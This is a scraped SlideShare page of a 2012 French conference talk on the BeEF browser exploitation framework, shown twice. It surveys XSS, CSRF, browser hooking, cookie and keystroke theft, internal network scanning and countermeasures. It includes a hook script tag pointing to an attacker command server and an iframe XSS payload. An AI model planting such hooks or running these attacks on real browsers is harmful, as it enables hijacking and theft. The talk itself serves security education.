SlideShare uma empresa Scribd logo

BeEF : The Browser Exploitation Framework

M
MDAL

Cette présentation a été réalisée à Résist (groupe de l'OSSIR sur Toulouse) en Septembre 2012. Elle présente succintement l'outil BeEF.

Tecnologia
1 de 43
Baixar para ler offline
BeEF : Browser Exploitation Framework 18 Septembre 2012 Presented by Etienne Maynier
Présentation BeEF - RéSIST Septembre 2012 # whoami • Pentest / audit sécurité • Intéressé par l’exploitation, la sécurité Web, le fuzzing, la sécurité réseau… • Participation à des projets opensource à mes heures perdues (BeEF, sulley) • MDAL ! Page 2 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Sommaire • Le Web côté client • BeEF • Présentation • Démo • Contre Mesures ? Page 3 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Disclaimer If anything can go wrong, it will. Page 4 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Intro Web ! Page 5 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Attaques web côté client • Le navigateur comme point d’entrée sur le poste de travail : • Phishing • Compromission de sites légitimes • XSS  Persistantes  Réfléchies  DOM-based Page 6 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Same Origin Policy • Limitation des actions au domaine • Domaine = Protocole + FQDN + port • Limitation d’accès au domaine pour les cookies, la DOM… • Limitation des XML HTTP Request cross-domain • Bloquées par défaut • Ne concerne que les requêtes et pas les balises img, script, iframe, video… • Implémentation différente selon les langages ! • Javascript : sauf si le serveur répond avec le bon entête (Access-Control-Allow-Origin: http://example.com) • Java & Flash: crossdomain.xml Page 7 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Cross Site Request Forgery Image: http://shiflett.org Page 8 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 ClickJacking Bouton sur un bouton : •Utilise la préauthentification de l’utilisateur sur le site • Ne permet pas d’injecter de paramètres POST ou de modifier la page Image: http://t37.net Page 9 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Quelques chiffres • 75% des sites hébergeant du code malveillant sont des sites légitimes compromis1 • 60% des 100 sites les plus populaires ont été impliqués ou ont hébergé une activité malveillante dans la première moitié de l’année 20081 • XSS découverts dans 55% des sites web testés par White Hat Security (1er type de vulnérabilité) 2 1 - Websense, State of Internet Security, 2008 2 – WhiteHat Security Website Statistics Report, Summer 2012 Page 10 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Exemples • 2005 : XSS dans Google.com • 2006 : CSRF dans Digg • 2007 : Ver XSS MySpace de Samy Kamkar • 2008 : CSRF dans ING permettant de lancer un transfert… • 2010 : Compromission de apache.org par une XSS « Web App Security Horror Studies », Simon Willison, 2009 Page 11 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Page 12 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Architecture •Ruby avec rails •Javascript avec Jquery Source: beefproject.com Page 13 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Interface (1/2) Zombies Infos sur le navigateur Page 14 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Interface (2/2) Description Historique Commandes Page 15 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Hooking • Lancement d’un script • <script src="http://10.1.1.1:3000/hook.js"></script> • Marquage du navigateur avec Evercookie • Etablissement d’un Command & Control avec le navigateur • Requêtes Hello toutes les secondes • Chargement d’une API javascript BeEF basée sur jquery Page 16 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Persistance • Man In The Browser • Simulation de tous les liens en AJAX (seulement dans le domaine) • Changement des URL via history.pushState • Autrement ouverture dans un nouvel onglet/fenêtre • Le browser reste « hooké » ! • Démo ! Page 17 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Play with the browser ! Page 18 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Récupération d’informations Vol de cookies (évidemment) Keylogger Vol de clipboard Liste des sites/domaines visités Fingerprint du navigateur (OS, plugins…) Webcam ! … Page 19 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Social Engineering Page 20 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Social Engineering • Phishing dans le site ! • Tab nabbing • Beef cloning and mass mailing en développement Page 21 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Network Discovery Page 22 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Get Internal IP Page 23 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Ping Sweep Page 24 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 DNS Enumeration Page 25 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Port Scanning Page 26 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Network Fingerprinting « Intranet Footprinting », Javier Marcos de Prado, Juan Galiana Lara Page 27 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Remote CSRF • CSRF trouvées dans des routeurs / Switch / Cameras • Linksys WRT54G : enable remote administration and change password • DLINK DSL500T : change password • Cisco E2400 change password • Camera DLINK DCS : change password • … Page 28 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 IRC NAT Pining 1 – Envoi une requête HTTP à un server IRC Simule une communication IRC 2 – Le Firewall / NAT enregistre la communication et ouvre le port 3 – Point d’entrée sur le réseau pour l’attaquant http://blog.beefproject.com/2012/07/opening-closed-ports-on-nat-device-and.html http://samy.pl/natpin/ Page 29 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Page 30 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Metasploit Intégration directe de MSF dans BeEF par xml-rpc : Page 31 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Tunneling Page 32 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Proxy Transfer Use as a proxy HTTP requests (limited by SOP) Page 33 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 XSS Rays (1/2) Page 34 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 XSS Rays (2/2) Page 35 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Contre-mesures Page 36 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Côté Applications Web • SDLC • Les injections SQL diminuent mais peu de considération pour les XSS / CSRF / Clickjacking… • « C’est juste une XSS… » • Web Application Firewall • Difficile à paramétrer et à gérer • Bypassable Page 37 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Côté client • Mettre à jour les navigateurs et plugins est la règle #1 ! • Java dans le navigateur est mort ! • Anti XSS • IE 8 / No Script... • Compromis sécurité / fonctionnalités • Peu de protections pour la majorité des attaques • C’est « juste » du Javascript ! • Le travail est pour les navigateurs et la standardisation (HTML5…) Page 38 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Côté réseau / organisation • Liste blanche des sites acceptés ! • Limite les possibilités de C&C • Gestion des incidents, réaction… • De plus en plus important avec les APT Page 39 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Conclusion Page 40 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 © MDAL SARL. All rights reserved. Confidential and proprietary document. This document and all information contained herein is the sole property of MDAL SARL. No intellectual property rights are granted by the delivery of this document or the disclosure of its content. This document shall not be reproduced or disclosed to a third party without the express written consent of MDAL SARL. This document and its content shall not be used for any purpose other than that for which it is supplied. The statements made herein do not constitute an offer. They are based on the mentioned assumptions and are expressed in good faith. Where the supporting grounds for these statements are not shown, MDAL SARL. will be pleased to explain the basis thereof. Page 41 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Références • http://beefproject.com/ • « Intranet Footprinting », Javier Marcos de Prado, Juan Galiana Lara • “Ground BeEF: Cutting, devouring and digesting the legs off a browser”, Michele antisnatchor Orru Page 42 © MDAL SARL. All rights reserved. Confidential and proprietary document.
Présentation BeEF - RéSIST Septembre 2012 Bonus : Vulnérabilité Chromium <iframe srcdoc="&lt;script&gt;alert(2)&lt;/script&gt;"></iframe> Status : Won’t fix ! https://code.google.com/p/chromium/issues/detail?id=148360 Page 43 © MDAL SARL. All rights reserved. Confidential and proprietary document.

Recomendados

Rubrica de evaluación de vídeo tutorial
Rubrica de evaluación de vídeo tutorialRubrica de evaluación de vídeo tutorial
Rubrica de evaluación de vídeo tutorial
Leonardo Torres
 
Tutorial Orkut 2
Tutorial Orkut 2Tutorial Orkut 2
Tutorial Orkut 2
ntebrusque
 
Practica 6
Practica 6 Practica 6
Practica 6
Leonardo Torres
 
Examen
ExamenExamen
Examen
climancc
 
Horario
HorarioHorario
Horario
iconcepcion
 
Jardim de Infância Manuel Beça Múrias
Jardim de Infância Manuel Beça MúriasJardim de Infância Manuel Beça Múrias
Jardim de Infância Manuel Beça Múrias
Sofia Pinto
 
Résilience du Cloud Computing: de l’illusion à la réalité
Résilience du Cloud Computing: de l’illusion à la réalitéRésilience du Cloud Computing: de l’illusion à la réalité
Résilience du Cloud Computing: de l’illusion à la réalité
Laurent Séguin
 
1_Accélération pour Transfer CFT en 2012_3 G!
1_Accélération pour Transfer CFT en 2012_3 G!1_Accélération pour Transfer CFT en 2012_3 G!
1_Accélération pour Transfer CFT en 2012_3 G!
Jean-Claude Bellando
 

Recomendados

Rubrica de evaluación de vídeo tutorial
Rubrica de evaluación de vídeo tutorialRubrica de evaluación de vídeo tutorial
Rubrica de evaluación de vídeo tutorial
Leonardo Torres
 
Tutorial Orkut 2
Tutorial Orkut 2Tutorial Orkut 2
Tutorial Orkut 2
ntebrusque
 
Practica 6
Practica 6 Practica 6
Practica 6
Leonardo Torres
 
Examen
ExamenExamen
Examen
climancc
 
Horario
HorarioHorario
Horario
iconcepcion
 
Jardim de Infância Manuel Beça Múrias
Jardim de Infância Manuel Beça MúriasJardim de Infância Manuel Beça Múrias
Jardim de Infância Manuel Beça Múrias
Sofia Pinto
 
Résilience du Cloud Computing: de l’illusion à la réalité
Résilience du Cloud Computing: de l’illusion à la réalitéRésilience du Cloud Computing: de l’illusion à la réalité
Résilience du Cloud Computing: de l’illusion à la réalité
Laurent Séguin
 
1_Accélération pour Transfer CFT en 2012_3 G!
1_Accélération pour Transfer CFT en 2012_3 G!1_Accélération pour Transfer CFT en 2012_3 G!
1_Accélération pour Transfer CFT en 2012_3 G!
Jean-Claude Bellando
 
Jamespot : cas client Renault Be Pro
Jamespot : cas client Renault Be ProJamespot : cas client Renault Be Pro
Jamespot : cas client Renault Be Pro
Alain GARNIER
 
Le CRM dans les nuages
Le CRM dans les nuagesLe CRM dans les nuages
Le CRM dans les nuages
E-DEAL
 
Ciments Calcia bétonne son système d'information
Ciments Calcia bétonne son système d'informationCiments Calcia bétonne son système d'information
Ciments Calcia bétonne son système d'information
Laurent Prevost
 
Le Cloud pour les pas si nuls par Sacha Labourey
Le Cloud pour les pas si nuls par Sacha LaboureyLe Cloud pour les pas si nuls par Sacha Labourey
Le Cloud pour les pas si nuls par Sacha Labourey
Publicis Sapient Engineering
 
Bilan2012Afisi
Bilan2012AfisiBilan2012Afisi
Bilan2012Afisi
Jean Lequeux
 
Redeploiement d’une plateforme eZpublish multisites internationale
Redeploiement d’une plateforme eZpublish multisites internationaleRedeploiement d’une plateforme eZpublish multisites internationale
Redeploiement d’une plateforme eZpublish multisites internationale
Kaliop-slide
 
Les pratiques des geants du web
Les pratiques des geants du webLes pratiques des geants du web
Les pratiques des geants du web
Stephen PERIN
 
Répondre à la déferlante BYOD en entreprise : Succès & difficultés en France
Répondre à la déferlante BYOD en entreprise : Succès & difficultés en FranceRépondre à la déferlante BYOD en entreprise : Succès & difficultés en France
Répondre à la déferlante BYOD en entreprise : Succès & difficultés en France
LaFrenchMobile
 
Portail d'entreprise / eXo Platform
Portail d'entreprise / eXo PlatformPortail d'entreprise / eXo Platform
Portail d'entreprise / eXo Platform
Tugdual Grall
 
Devoxx france-2013-lecons-cloud
Devoxx france-2013-lecons-cloudDevoxx france-2013-lecons-cloud
Devoxx france-2013-lecons-cloud
Dali Kilani
 
15h30 societe generale_mathieu_renault.ppt (lecture seule)
15h30 societe generale_mathieu_renault.ppt (lecture seule)15h30 societe generale_mathieu_renault.ppt (lecture seule)
15h30 societe generale_mathieu_renault.ppt (lecture seule)
stephanfrancois
 
Dialonics soutenance de projet final (31 aout 2012)
Dialonics soutenance de projet final (31 aout 2012)Dialonics soutenance de projet final (31 aout 2012)
Dialonics soutenance de projet final (31 aout 2012)
legendcasio
 
Mythes & légendes du digital marketing adobe slides e com 2013
Mythes & légendes du digital marketing adobe slides e com 2013Mythes & légendes du digital marketing adobe slides e com 2013
Mythes & légendes du digital marketing adobe slides e com 2013
BY_CONNECT
 
Be-Bound - Revue de presse web - décembre 2012
Be-Bound - Revue de presse web - décembre 2012Be-Bound - Revue de presse web - décembre 2012
Be-Bound - Revue de presse web - décembre 2012
Be-Bound
 
Scroll ou clic | Web-In 2012
Scroll ou clic | Web-In 2012Scroll ou clic | Web-In 2012
Scroll ou clic | Web-In 2012
RevSquare
 
Monizze presentation-uk (slideshare)
Monizze presentation-uk (slideshare)Monizze presentation-uk (slideshare)
Monizze presentation-uk (slideshare)
Monizze
 
Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...
Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...
Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...
AT Internet
 
Bien Démarrer avec le Responsive Web Design
Bien Démarrer avec le Responsive Web DesignBien Démarrer avec le Responsive Web Design
Bien Démarrer avec le Responsive Web Design
Greg Hoin
 
Edition 2012 du Baromètre des Prestataires Cloud Computing
Edition 2012 du Baromètre des Prestataires Cloud Computing Edition 2012 du Baromètre des Prestataires Cloud Computing
Edition 2012 du Baromètre des Prestataires Cloud Computing
MARKESS
 
La révolution des applications métiers - EXALEAD et BULL
La révolution des applications métiers - EXALEAD et BULLLa révolution des applications métiers - EXALEAD et BULL
La révolution des applications métiers - EXALEAD et BULL
Documation Gestion de l'information et du document numérique en entreprise
 

Mais conteúdo relacionado

Semelhante a BeEF : The Browser Exploitation Framework

Ciments Calcia bétonne son système d'information
Ciments Calcia bétonne son système d'informationCiments Calcia bétonne son système d'information
Ciments Calcia bétonne son système d'information
Laurent Prevost
 
Redeploiement d’une plateforme eZpublish multisites internationale
Redeploiement d’une plateforme eZpublish multisites internationaleRedeploiement d’une plateforme eZpublish multisites internationale
Redeploiement d’une plateforme eZpublish multisites internationale
Kaliop-slide
 
Devoxx france-2013-lecons-cloud
Devoxx france-2013-lecons-cloudDevoxx france-2013-lecons-cloud
Devoxx france-2013-lecons-cloud
Dali Kilani
 
15h30 societe generale_mathieu_renault.ppt (lecture seule)
15h30 societe generale_mathieu_renault.ppt (lecture seule)15h30 societe generale_mathieu_renault.ppt (lecture seule)
15h30 societe generale_mathieu_renault.ppt (lecture seule)
stephanfrancois
 
Mythes & légendes du digital marketing adobe slides e com 2013
Mythes & légendes du digital marketing adobe slides e com 2013Mythes & légendes du digital marketing adobe slides e com 2013
Mythes & légendes du digital marketing adobe slides e com 2013
BY_CONNECT
 
Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...
Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...
Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...
AT Internet
 

Semelhante a BeEF : The Browser Exploitation Framework (20)

Jamespot : cas client Renault Be Pro
Jamespot : cas client Renault Be ProJamespot : cas client Renault Be Pro
Jamespot : cas client Renault Be Pro
 
Le CRM dans les nuages
Le CRM dans les nuagesLe CRM dans les nuages
Le CRM dans les nuages
 
Ciments Calcia bétonne son système d'information
Ciments Calcia bétonne son système d'informationCiments Calcia bétonne son système d'information
Ciments Calcia bétonne son système d'information
 
Le Cloud pour les pas si nuls par Sacha Labourey
Le Cloud pour les pas si nuls par Sacha LaboureyLe Cloud pour les pas si nuls par Sacha Labourey
Le Cloud pour les pas si nuls par Sacha Labourey
 
Bilan2012Afisi
Bilan2012AfisiBilan2012Afisi
Bilan2012Afisi
 
Redeploiement d’une plateforme eZpublish multisites internationale
Redeploiement d’une plateforme eZpublish multisites internationaleRedeploiement d’une plateforme eZpublish multisites internationale
Redeploiement d’une plateforme eZpublish multisites internationale
 
Les pratiques des geants du web
Les pratiques des geants du webLes pratiques des geants du web
Les pratiques des geants du web
 
Répondre à la déferlante BYOD en entreprise : Succès & difficultés en France
Répondre à la déferlante BYOD en entreprise : Succès & difficultés en FranceRépondre à la déferlante BYOD en entreprise : Succès & difficultés en France
Répondre à la déferlante BYOD en entreprise : Succès & difficultés en France
 
Portail d'entreprise / eXo Platform
Portail d'entreprise / eXo PlatformPortail d'entreprise / eXo Platform
Portail d'entreprise / eXo Platform
 
Devoxx france-2013-lecons-cloud
Devoxx france-2013-lecons-cloudDevoxx france-2013-lecons-cloud
Devoxx france-2013-lecons-cloud
 
15h30 societe generale_mathieu_renault.ppt (lecture seule)
15h30 societe generale_mathieu_renault.ppt (lecture seule)15h30 societe generale_mathieu_renault.ppt (lecture seule)
15h30 societe generale_mathieu_renault.ppt (lecture seule)
 
Dialonics soutenance de projet final (31 aout 2012)
Dialonics soutenance de projet final (31 aout 2012)Dialonics soutenance de projet final (31 aout 2012)
Dialonics soutenance de projet final (31 aout 2012)
 
Mythes & légendes du digital marketing adobe slides e com 2013
Mythes & légendes du digital marketing adobe slides e com 2013Mythes & légendes du digital marketing adobe slides e com 2013
Mythes & légendes du digital marketing adobe slides e com 2013
 
Be-Bound - Revue de presse web - décembre 2012
Be-Bound - Revue de presse web - décembre 2012Be-Bound - Revue de presse web - décembre 2012
Be-Bound - Revue de presse web - décembre 2012
 
Scroll ou clic | Web-In 2012
Scroll ou clic | Web-In 2012Scroll ou clic | Web-In 2012
Scroll ou clic | Web-In 2012
 
Monizze presentation-uk (slideshare)
Monizze presentation-uk (slideshare)Monizze presentation-uk (slideshare)
Monizze presentation-uk (slideshare)
 
Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...
Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...
Multi-device : l'analytique au service de votre stratégie digitale mobile (OI...
 
Bien Démarrer avec le Responsive Web Design
Bien Démarrer avec le Responsive Web DesignBien Démarrer avec le Responsive Web Design
Bien Démarrer avec le Responsive Web Design
 
Edition 2012 du Baromètre des Prestataires Cloud Computing
Edition 2012 du Baromètre des Prestataires Cloud Computing Edition 2012 du Baromètre des Prestataires Cloud Computing
Edition 2012 du Baromètre des Prestataires Cloud Computing
 
La révolution des applications métiers - EXALEAD et BULL
La révolution des applications métiers - EXALEAD et BULLLa révolution des applications métiers - EXALEAD et BULL
La révolution des applications métiers - EXALEAD et BULL
 

BeEF : The Browser Exploitation Framework

  • 1. BeEF : Browser Exploitation Framework 18 Septembre 2012 Presented by Etienne Maynier
  • 2. Présentation BeEF - RéSIST Septembre 2012 # whoami • Pentest / audit sécurité • Intéressé par l’exploitation, la sécurité Web, le fuzzing, la sécurité réseau… • Participation à des projets opensource à mes heures perdues (BeEF, sulley) • MDAL ! Page 2 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 3. Présentation BeEF - RéSIST Septembre 2012 Sommaire • Le Web côté client • BeEF • Présentation • Démo • Contre Mesures ? Page 3 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 4. Présentation BeEF - RéSIST Septembre 2012 Disclaimer If anything can go wrong, it will. Page 4 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 5. Présentation BeEF - RéSIST Septembre 2012 Intro Web ! Page 5 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 6. Présentation BeEF - RéSIST Septembre 2012 Attaques web côté client • Le navigateur comme point d’entrée sur le poste de travail : • Phishing • Compromission de sites légitimes • XSS  Persistantes  Réfléchies  DOM-based Page 6 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 7. Présentation BeEF - RéSIST Septembre 2012 Same Origin Policy • Limitation des actions au domaine • Domaine = Protocole + FQDN + port • Limitation d’accès au domaine pour les cookies, la DOM… • Limitation des XML HTTP Request cross-domain • Bloquées par défaut • Ne concerne que les requêtes et pas les balises img, script, iframe, video… • Implémentation différente selon les langages ! • Javascript : sauf si le serveur répond avec le bon entête (Access-Control-Allow-Origin: http://example.com) • Java & Flash: crossdomain.xml Page 7 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 8. Présentation BeEF - RéSIST Septembre 2012 Cross Site Request Forgery Image: http://shiflett.org Page 8 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 9. Présentation BeEF - RéSIST Septembre 2012 ClickJacking Bouton sur un bouton : •Utilise la préauthentification de l’utilisateur sur le site • Ne permet pas d’injecter de paramètres POST ou de modifier la page Image: http://t37.net Page 9 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 10. Présentation BeEF - RéSIST Septembre 2012 Quelques chiffres • 75% des sites hébergeant du code malveillant sont des sites légitimes compromis1 • 60% des 100 sites les plus populaires ont été impliqués ou ont hébergé une activité malveillante dans la première moitié de l’année 20081 • XSS découverts dans 55% des sites web testés par White Hat Security (1er type de vulnérabilité) 2 1 - Websense, State of Internet Security, 2008 2 – WhiteHat Security Website Statistics Report, Summer 2012 Page 10 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 11. Présentation BeEF - RéSIST Septembre 2012 Exemples • 2005 : XSS dans Google.com • 2006 : CSRF dans Digg • 2007 : Ver XSS MySpace de Samy Kamkar • 2008 : CSRF dans ING permettant de lancer un transfert… • 2010 : Compromission de apache.org par une XSS « Web App Security Horror Studies », Simon Willison, 2009 Page 11 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 12. Présentation BeEF - RéSIST Septembre 2012 Page 12 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 13. Présentation BeEF - RéSIST Septembre 2012 Architecture •Ruby avec rails •Javascript avec Jquery Source: beefproject.com Page 13 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 14. Présentation BeEF - RéSIST Septembre 2012 Interface (1/2) Zombies Infos sur le navigateur Page 14 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 15. Présentation BeEF - RéSIST Septembre 2012 Interface (2/2) Description Historique Commandes Page 15 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 16. Présentation BeEF - RéSIST Septembre 2012 Hooking • Lancement d’un script • <script src="http://10.1.1.1:3000/hook.js"></script> • Marquage du navigateur avec Evercookie • Etablissement d’un Command & Control avec le navigateur • Requêtes Hello toutes les secondes • Chargement d’une API javascript BeEF basée sur jquery Page 16 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 17. Présentation BeEF - RéSIST Septembre 2012 Persistance • Man In The Browser • Simulation de tous les liens en AJAX (seulement dans le domaine) • Changement des URL via history.pushState • Autrement ouverture dans un nouvel onglet/fenêtre • Le browser reste « hooké » ! • Démo ! Page 17 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 18. Présentation BeEF - RéSIST Septembre 2012 Play with the browser ! Page 18 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 19. Présentation BeEF - RéSIST Septembre 2012 Récupération d’informations Vol de cookies (évidemment) Keylogger Vol de clipboard Liste des sites/domaines visités Fingerprint du navigateur (OS, plugins…) Webcam ! … Page 19 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 20. Présentation BeEF - RéSIST Septembre 2012 Social Engineering Page 20 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 21. Présentation BeEF - RéSIST Septembre 2012 Social Engineering • Phishing dans le site ! • Tab nabbing • Beef cloning and mass mailing en développement Page 21 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 22. Présentation BeEF - RéSIST Septembre 2012 Network Discovery Page 22 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 23. Présentation BeEF - RéSIST Septembre 2012 Get Internal IP Page 23 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 24. Présentation BeEF - RéSIST Septembre 2012 Ping Sweep Page 24 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 25. Présentation BeEF - RéSIST Septembre 2012 DNS Enumeration Page 25 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 26. Présentation BeEF - RéSIST Septembre 2012 Port Scanning Page 26 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 27. Présentation BeEF - RéSIST Septembre 2012 Network Fingerprinting « Intranet Footprinting », Javier Marcos de Prado, Juan Galiana Lara Page 27 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 28. Présentation BeEF - RéSIST Septembre 2012 Remote CSRF • CSRF trouvées dans des routeurs / Switch / Cameras • Linksys WRT54G : enable remote administration and change password • DLINK DSL500T : change password • Cisco E2400 change password • Camera DLINK DCS : change password • … Page 28 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 29. Présentation BeEF - RéSIST Septembre 2012 IRC NAT Pining 1 – Envoi une requête HTTP à un server IRC Simule une communication IRC 2 – Le Firewall / NAT enregistre la communication et ouvre le port 3 – Point d’entrée sur le réseau pour l’attaquant http://blog.beefproject.com/2012/07/opening-closed-ports-on-nat-device-and.html http://samy.pl/natpin/ Page 29 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 30. Présentation BeEF - RéSIST Septembre 2012 Page 30 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 31. Présentation BeEF - RéSIST Septembre 2012 Metasploit Intégration directe de MSF dans BeEF par xml-rpc : Page 31 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 32. Présentation BeEF - RéSIST Septembre 2012 Tunneling Page 32 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 33. Présentation BeEF - RéSIST Septembre 2012 Proxy Transfer Use as a proxy HTTP requests (limited by SOP) Page 33 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 34. Présentation BeEF - RéSIST Septembre 2012 XSS Rays (1/2) Page 34 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 35. Présentation BeEF - RéSIST Septembre 2012 XSS Rays (2/2) Page 35 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 36. Présentation BeEF - RéSIST Septembre 2012 Contre-mesures Page 36 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 37. Présentation BeEF - RéSIST Septembre 2012 Côté Applications Web • SDLC • Les injections SQL diminuent mais peu de considération pour les XSS / CSRF / Clickjacking… • « C’est juste une XSS… » • Web Application Firewall • Difficile à paramétrer et à gérer • Bypassable Page 37 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 38. Présentation BeEF - RéSIST Septembre 2012 Côté client • Mettre à jour les navigateurs et plugins est la règle #1 ! • Java dans le navigateur est mort ! • Anti XSS • IE 8 / No Script... • Compromis sécurité / fonctionnalités • Peu de protections pour la majorité des attaques • C’est « juste » du Javascript ! • Le travail est pour les navigateurs et la standardisation (HTML5…) Page 38 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 39. Présentation BeEF - RéSIST Septembre 2012 Côté réseau / organisation • Liste blanche des sites acceptés ! • Limite les possibilités de C&C • Gestion des incidents, réaction… • De plus en plus important avec les APT Page 39 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 40. Présentation BeEF - RéSIST Septembre 2012 Conclusion Page 40 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 41. Présentation BeEF - RéSIST Septembre 2012 © MDAL SARL. All rights reserved. Confidential and proprietary document. This document and all information contained herein is the sole property of MDAL SARL. No intellectual property rights are granted by the delivery of this document or the disclosure of its content. This document shall not be reproduced or disclosed to a third party without the express written consent of MDAL SARL. This document and its content shall not be used for any purpose other than that for which it is supplied. The statements made herein do not constitute an offer. They are based on the mentioned assumptions and are expressed in good faith. Where the supporting grounds for these statements are not shown, MDAL SARL. will be pleased to explain the basis thereof. Page 41 © MDAL SARL. All rights reserved. Confidential and proprietary document.
  • 42. Présentation BeEF - RéSIST Septembre 2012 Références • http://beefproject.com/ • « Intranet Footprinting », Javier Marcos de Prado, Juan Galiana Lara • “Ground BeEF: Cutting, devouring and digesting the legs off a browser”, Michele antisnatchor Orru Page 42 © MDAL SARL. All rights reserved. Confidential and proprietary document.
